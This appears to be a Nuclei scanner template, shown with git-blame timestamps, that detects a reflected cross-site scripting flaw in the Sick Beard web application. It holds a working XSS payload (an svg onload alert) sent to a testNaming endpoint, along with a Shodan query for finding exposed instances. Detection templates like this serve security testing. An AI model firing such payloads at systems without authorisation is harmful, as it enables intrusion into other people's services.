2020-08-28 20:55:56 +00:00
|
|
|
id: sick-beard-xss
|
|
|
|
|
|
|
|
info:
|
2020-08-28 21:03:17 +00:00
|
|
|
name: Sick Beard XSS
|
2020-08-28 20:55:56 +00:00
|
|
|
author: pikpikcu
|
|
|
|
severity: medium
|
2021-08-19 13:15:35 +00:00
|
|
|
reference:
|
|
|
|
- https://sickbeard.com/ # vendor homepage
|
|
|
|
- https://github.com/midgetspy/Sick-Beard # software link
|
2021-09-16 15:54:33 +00:00
|
|
|
metadata:
|
2021-10-22 17:53:25 +00:00
|
|
|
shodan-query: sickbeard
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: xss
|
2020-08-28 20:55:56 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2020-09-03 15:56:31 +00:00
|
|
|
- "{{BaseURL}}/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E"
|
2020-08-28 20:55:56 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- <svg/onload=alert(document.domain)>
|
2020-12-13 19:24:23 +00:00
|
|
|
part: body
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
part: header
|